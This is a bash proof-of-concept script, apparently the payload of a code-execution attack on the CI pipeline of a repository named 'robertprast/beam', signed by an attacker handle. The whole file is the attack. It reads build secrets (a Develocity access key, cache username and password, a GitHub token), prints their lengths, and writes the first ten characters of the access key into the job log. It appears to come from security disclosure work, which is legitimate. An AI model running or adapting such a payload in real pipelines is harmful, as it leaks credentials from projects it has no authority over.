#!/bin/bash
echo "========================================="
echo "  POC: LOTP Code Execution Successful"
echo "  Attacker: treborlab"
echo "  Target: robertprast/beam"
echo "  Time: $(date -u)"
echo "========================================="
echo ""
echo "=== Secrets in environment ==="
echo "DEVELOCITY_ACCESS_KEY length: ${#DEVELOCITY_ACCESS_KEY}"
echo "GE_CACHE_USERNAME length: ${#GE_CACHE_USERNAME}"  
echo "GE_CACHE_PASSWORD length: ${#GE_CACHE_PASSWORD}"
echo "GITHUB_TOKEN length: ${#GITHUB_TOKEN}"
echo ""
echo "=== DEVELOCITY_ACCESS_KEY first 10 chars ==="
echo "${DEVELOCITY_ACCESS_KEY:0:10}..."
echo ""
echo "=== hi from trebor ==="
echo "poc complete"

